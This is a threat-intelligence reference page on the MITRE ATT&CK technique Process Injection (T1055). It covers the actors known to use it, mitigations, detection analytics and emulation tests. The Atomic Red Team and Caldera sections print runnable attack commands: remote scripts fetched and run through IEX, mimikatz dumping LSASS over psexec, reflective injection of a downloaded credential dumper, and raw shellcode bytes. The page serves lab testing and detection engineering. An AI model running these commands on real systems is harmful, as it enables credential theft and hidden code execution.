Home/ATT&CK Technique/Process Injection
ATT&CK Technique

Process Injection

T1055 · stealth, privilege-escalation

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges.

Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

LinuxmacOSWindows

Actors Using This

14
latin_america_brazilian_organized_cybercrimeAmavaldo
north_koreaAndariel
chinaAPT10
chinaAPT1
chinaAPT31
iranAPT33
iranOilRig
iranAPT35
north_koreaAPT37
north_koreaAPT38
iranAPT39
chinaAPT40
chinaAPT41
china_state_sponsored_mandiant_canonical_microsoft_mulberry_typhoonAPT5 (UNC2630 / UNC2717 / Mulberry Typhoon)

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
initial-access earlier
T0865 · Spearphishing Attachment ×2.98
persistence earlier
T1137.006 · Add-ins ×2.98T1205 · Traffic Signaling ×2.98
privilege-escalation same
T1055.001 · Dynamic-link Library Injection ×2.98T1055.012 · Process Hollowing ×2.98T1546.001 · Change Default File Association ×2.98T1546.011 · Application Shimming ×2.98
discovery later
T1007 · System Service Discovery ×2.98T1124 · System Time Discovery ×2.98
collection later
T0801 · Monitor Process State ×2.98T1213.006 · Databases ×2.98
command-and-control later
T1008 · Fallback Channels ×2.98T1104 · Multi-Stage Channels ×2.98
other same
T1070.003 · Clear Command History ×2.98T1562.003 · Impair Command History Logging ×2.98

Atomic Tests

13
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsShellcode execution via VBA
This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
command_promptwindowsRemote Process Injection in LSASS via mimikatz
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html> 
"#{psexec_path}" /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"
powershellwindowsSection View Injection
This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. A thread is then created in the target process, using the remote section view as start address. 
$notepad = Start-Process notepad -passthru
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\InjectView.exe"
powershellwindowsDirty Vanity process Injection
This test used the Windows undocumented remote-fork API RtlCreateProcessReflection to create a cloned process of the parent process with shellcode written in its memory. The shellcode is executed after being forked to the child process. The technique was first presented at BlackHat Europe 2022. Shellcode will open a messsage box and a notepad. 
Start-Process "$PathToAtomicsFolder\T1055\bin\x64\redVanity.exe" #{pid}
powershellelevatedwindowsRead-Write-Execute process Injection
This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode. The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread. The injected shellcode will open a message box and a notepad. RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes. More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution. The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector. 
$address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
powershellwindowsProcess Injection with Go using UuidFromStringA WinAPI
Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA. With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa) - References: - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ - https://twitter.com/_CPResearch_/status/1352310521752662018 - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala 
$PathToAtomicsFolder\T1055\bin\x64\UuidFromStringA.exe -debug
powershellwindowsProcess Injection with Go using EtwpCreateEtwThread WinAPI
Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process. This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. Steps taken with this technique 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call EtwpCreateEtwThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread) - References: - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3 - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm 
$PathToAtomicsFolder\T1055\bin\x64\EtwpCreateEtwThread.exe -debug
powershellwindowsRemote Process Injection with Go using RtlCreateUserThread WinAPI
Executes shellcode in a remote process. Steps taken with this technique 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread) - References: - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike 
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process. This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess(). Steps taken with this technique 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread) - References: - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection 
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
powershellwindowsRemote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process. This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 1. Get a handle to the target process 2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write 3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process 4. Change the memory page permissions to Execute/Read with VirtualProtectEx 5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread 6. Close the handle to the remote process - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative) 
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
powershellwindowsProcess Injection with Go using CreateThread WinAPI
This program executes shellcode in the current process using the following steps 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call CreateThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread) 
$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe -debug
powershellwindowsProcess Injection with Go using CreateThread WinAPI (Natively)
This program executes shellcode in the current process using the following steps 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 3. Change the memory page permissions to Execute/Read with VirtualProtect 4. Call CreateThread on shellcode address 5. Call WaitForSingleObject so the program does not end before the shellcode is executed This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative) 
$PathToAtomicsFolder\T1055\bin\x64\CreateThreadNative.exe -debug
powershellelevatedwindowsUUID custom process Injection
The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread The injected shellcode will open a message box and a notepad. Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ Concept from: http://ropgadget.com/posts/abusing_win_functions.html 
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force

Mitigations

2
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1040Behavior Prevention on Endpoint

Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack.

Suspicious Process Behavior
  • Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
  • Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.
Unauthorized File Access
  • Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
  • Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.
Abnormal API Calls
  • Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
  • Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like OpenProcess and WriteProcessMemory and terminates the offending process.
Exploit Prevention
  • Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
  • Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 24
Analytics (MITRE CAR) 3
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

3
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2013-10-002Moderate coverageDLL Injection via Load Library

Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes.

For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls.

One of the most common methods of DLL Injection is through the Windows API LoadLibrary.

- Allocate memory in the target program with VirtualAllocEx
  • Write the name of the DLL to inject into this program with WriteProcessMemory.
  • Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread. This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.
pseudocode
remote_thread = search Thread:RemoteCreate
remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")

output remote_thread
LogPoint
norm_id=WindowsSysmon event_id=8 start_function IN ["LoadLibraryA", "LoadLibraryW"] -source_image="C:\Path\To\TrustedProgram.exe"
CAR-2020-11-003Low coverageDLL Injection with Mavinject

Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it roles up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument "INJECTRUNNING" as a related signature here.

Whitelisting certain applications may be necessary to reduce noise for this analytic.

Pseudocode - Pseudocode - mavinject process and its common argument
processes = search Process:Create
mavinject_processes = filter processes where (
  exe = "C:\\Windows\\SysWOW64\\mavinject.exe" OR Image="C:\\Windows\\System32\\mavinject.exe" OR command_line = "*/INJECTRUNNING*"
output mavinject_processes
Splunk - Splunk Search - mavinject
(index=__your_sysmon_index__ EventCode=1) (Image="C:\\Windows\\SysWOW64\\mavinject.exe" OR Image="C:\\Windows\\System32\\mavinject.exe" OR CommandLine="*\INJECTRUNNING*")
LogPoint - LogPoint Search - mavinject
norm_id=WindowsSysmon event_id=1 (image="C:\Windows\SysWOW64\mavinject.exe" OR image="C:\Windows\System32\mavinject.exe" OR command="*\INJECTRUNNING*")
CAR-2020-11-004Low coverageProcesses Started From Irregular Parent

Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past.

when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discepency. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event.

Pseudocode - Pseudocode - common processes that do not have the correct parent
processes = search Process:Create
mismatch_processes = filter processes where ( parent_exe exists AND
  (exe="smss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="System") OR
  (exe="csrss.exe" AND (parent_exe!="smss.exe" AND parent_exe!="svchost.exe")) OR
  (exe="wininit.exe" AND parent_exe!="smss.exe") OR
  (exe="winlogon.exe" AND parent_exe!="smss.exe") OR
  (exe="lsass.exe" AND (parent_exe!="wininit.exe" AND parent_exe!="winlogon.exe")) OR
  (exe="LogonUI.exe" AND (parent_exe!="winlogon.exe" AND parent_exe!="wininit.exe")) OR
  (exe="services.exe" AND parent_exe!="wininit.exe") OR
  (exe="spoolsv.exe" AND parent_exe!="services.exe") OR
  (exe="taskhost.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="taskhostw.exe" AND (parent_exe!="services.exe" AND parent_exe!="svchost.exe")) OR
  (exe="userinit.exe" AND (parent_exe!="dwm.exe" AND parent_exe!="winlogon.exe"))
output mismatch_processes
Splunk - Splunk Search - parent/child mismatch
(index=__your_sysmon_index__ EventCode=1) AND ParentImage!="?" AND ParentImage!="C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe" AND ParentImage!="C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe" AND
((Image="C:\\Windows\System32\\smss.exe" AND (ParentImage!="C:\\Windows\\System32\\smss.exe" AND ParentImage!="System")) OR
(Image="C:\\Windows\\System32\\csrss.exe" AND (ParentImage!="C:\\Windows\\System32\\smss.exe" AND ParentImage!="C:\\Windows\\System32\\svchost.exe")) OR
(Image="C:\\Windows\\System32\\wininit.exe" AND ParentImage!="C:\\Windows\\System32\\smss.exe") OR
(Image="C:\\Windows\\System32\\winlogon.exe" AND ParentImage!="C:\\Windows\\System32\\smss.exe") OR
(Image="C:\\Windows\\System32\\lsass.exe" and ParentImage!="C:\\Windows\\System32\\wininit.exe") OR
(Image="C:\\Windows\\System32\\LogonUI.exe" AND (ParentImage!="C:\\Windows\\System32\\winlogon.exe" AND ParentImage!="C:\\Windows\\System32\\wininit.exe")) OR
(Image="C:\\Windows\\System32\\services.exe" AND ParentImage!="C:\\Windows\\System32\\wininit.exe") OR
(Image="C:\\Windows\\System32\\spoolsv.exe" AND ParentImage!="C:\\Windows\\System32\\services.exe") OR
(Image="C:\\Windows\\System32\\taskhost.exe" AND (ParentImage!="C:\\Windows\\System32\\services.exe" AND ParentImage!="C:\\Windows\\System32\\svchost.exe")) OR
(Image="C:\\Windows\\System32\\taskhostw.exe" AND (ParentImage!="C:\\Windows\\System32\\services.exe" AND ParentImage!="C:\\Windows\\System32\\svchost.exe")) OR
(Image="C:\\Windows\System32\\userinit.exe" AND (ParentImage!="C:\\Windows\\System32\\dwm.exe" AND ParentImage!="C:\\Windows\\System32\\winlogon.exe")))
LogPoint - LogPoint Search - parent/child mismatch
norm_id=WindowsSysmon event_id=1 -parent_image="?" ((image="*\smss.exe" (-parent_image="*\smss.exe" -parent_image="*\System")) OR
(image="*\csrss.exe" (-parent_image="*\smss.exe" -parent_image="*\svchost.exe")) OR (image="*\wininit.exe" -parent_image="*\smss.exe") OR
(image="*\winlogon.exe" -parent_image="*\smss.exe") OR (image="*\lsass.exe"  (-parent_image="*\wininit.exe"  -parent_image="*\winlogon.exe")) OR
(image="*\LogonUI.exe"  (-parent_image="*\winlogon.exe"  -parent_image="*\wininit.exe")) OR (image="*\services.exe"  -parent_image="*\wininit.exe") OR
(image="*\spoolsv.exe"  -parent_image="*\services.exe") OR (image="*\taskhost.exe"  (-parent_image="*\services.exe"  -parent_image="*\svchost.exe")) OR
(image="*\taskhostw.exe"  (-parent_image="*\services.exe"  -parent_image="*\svchost.exe")) OR
(image="*\userinit.exe"  (-parent_image="*\dwm.exe"  -parent_image="*\winlogon.exe")))

Caldera Emulation

5
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
credential-accesswindowsInject Cred dumper into process (Spookier)
$url="#{server}/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("file","debugger.dll");
$PBytes = $wc.DownloadData($url);
$wc1 = New-Object System.net.webclient;
$wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1");
IEX ($wc1.DownloadString($url));
Invoke-ReflectivePEInjection -PBytes $PBytes -verbose
defense-evasionwindowsInject Sandcat into process
$url="#{server}/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","shared.go");
$wc.Headers.add("server","#{server}");
$PEBytes = $wc.DownloadData($url);
$wc1 = New-Object System.net.webclient;
$wc1.headers.add("file","Invoke-ReflectivePEInjection.ps1");
IEX ($wc1.DownloadString($url));
Invoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}
defense-evasionwindowsSigned Binary Execution - Mavinject
$explorer = Get-Process -Name explorer;
mavinject.exe $explorer.id C:\Users\Public\sandcat.dll
defense-evasionwindowsSigned Binary Execution - odbcconf
odbcconf.exe /S /A {REGSVR "C:\Users\Public\sandcat.dll"}
defense-evasionwindowsSpawn calculator (shellcode)
0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, CM-05, CM-06, IA-02, SC-07, SC-18, SI-02, SI-03, SI-04
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin